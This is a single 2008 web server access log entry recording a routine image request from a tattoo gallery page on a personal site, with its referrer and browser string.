207.200.116.7 - - [22/Aug/2008:00:37:12 -0500] "GET /tattoo/tatd6.JPG HTTP/1.1" 200 12059 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.1; AOLBuild 4334.34; Windows NT 5.1; FunWebProducts; .NET CLR 2.0.50727)"
